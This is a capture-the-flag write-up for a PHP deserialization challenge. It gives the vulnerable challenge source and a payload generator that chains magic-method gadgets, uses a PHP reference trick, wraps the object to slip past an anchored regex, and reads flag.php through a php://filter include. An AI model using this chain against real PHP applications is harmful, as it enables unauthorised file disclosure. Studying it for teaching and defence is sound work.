serialize — SHCTF PHP deserialization challenge (writeup)
<?php
// SHCTF "serialize": the page first echoes its own source, then feeds an
// attacker-controlled GET value to unserialize(). That is the intended bug of the
// challenge; in real code never unserialize() untrusted input — use json_decode().
highlight_file(__FILE__);

// Gadget 1: reading an undeclared property on a misca runs __get, which ends in die($this->a).
class misca {
    public $gao;
    public $fei;
    public $a;

    // Reached from musca::__wakeup reading $this->ding->dong when $ding is a misca.
    // miaomiao() first resets $a to a plain string, so a naive payload only prints
    // 'Mikey Mouse~'. If $gao was serialized as a PHP reference to $a (an R:n token),
    // the assignment below writes $fei through that reference into $a, and die()
    // then string-converts the object in $a, which is what reaches milaoshu::__tostring.
    public function __get($key) {
        $this->miaomiao();
        $this->gao = $this->fei;
        die($this->a);
    }

    // Clobbers $a before the copy above; the reference trick is what undoes this.
    public function miaomiao() {
        $this->a = 'Mikey Mouse~';
    }
}

// Gadget 0 (entry point): __wakeup runs as soon as unserialize() rebuilds the object,
// even when that object is nested inside another value such as an array.
class musca {
    public $ding;
    public $dong;

    // $this->ding->dong: misca declares no $dong, so with a misca in $ding this
    // property read fires misca::__get.
    public function __wakeup() {
        return $this->ding->dong;
    }
}

// Gadget 2 (sink): string conversion includes an attacker-chosen path.
class milaoshu {
    public $v;

    // PHP method names are case-insensitive, so __tostring is the __toString hook.
    // include() on a controlled value is a file-inclusion sink; with a
    // php://filter/convert.base64-encode wrapper the target file's source is
    // printed as base64 instead of being executed.
    public function __tostring() {
        echo "misca~musca~milaoshu~~~";
        include($this->v);
    }
}

// The only guard: rejects payloads that BEGIN with an object token.
// Because the pattern is anchored with ^, an object nested inside another value
// (e.g. `a:1:{i:0;O:5:"musca":...}`) passes, and unserialize() still rebuilds the
// inner object and runs its __wakeup. Pattern-matching serialized syntax is not a
// defence; the real fix is to not unserialize() user input at all.
function check($data) {
    if (preg_match('/^O:\d+/', $data)) {
        die("you should think harder!");
    } else return $data;
}

// NOTE(review): PHP rewrites '.' in incoming GET/POST variable names to '_', so a
// literal `wanna_fl.ag=` query string does not populate this key. The page does not
// show how the key was supplied; the usual trick is an unmatched '[' in the name
// (e.g. `wanna[fl.ag=`), after which PHP stops rewriting later dots — verify on the
// target's PHP version.
unserialize(check($_GET["wanna_fl.ag"]));
Exploit (payload generator):
<?php
// Payload generator for the SHCTF "serialize" challenge. The class stubs only need the
// property names and their declaration order: unserialize() on the target maps the
// serialized properties onto the real classes, which carry the magic methods.
class misca {
    public $gao;
    public $fei;
    public $a;
}

class musca {
    public $ding;
    public $dong;
}

class milaoshu {
    public $v;
}

// Sink: the target's __toString gadget does include($this->v). The php://filter
// wrapper base64-encodes flag.php so its source is printed rather than executed.
$sink = new milaoshu();
$sink->v = "php://filter/convert.base64-encode/resource=flag.php";

// Middle gadget: on the target, __get resets $a to a string, copies $fei into $gao,
// then calls die($a). Binding $gao as a reference to $a (serialized as an R:n token)
// turns that copy into a write to $a, so die() string-converts the milaoshu object.
$middle = new misca();
$middle->fei = $sink;
$middle->gao = &$middle->a;

// Entry gadget: __wakeup reads $ding->dong; with a misca in $ding (which has no
// $dong property) that read fires __get.
$entry = new musca();
$entry->ding = $middle;

// Wrap the object in an array so the payload starts with "a:" and slips past the
// anchored /^O:\d+/ check; the nested object is still rebuilt and its __wakeup runs.
echo serialize([$entry]);
Source: https://www.cnblogs.com/kode00/p/17780458.html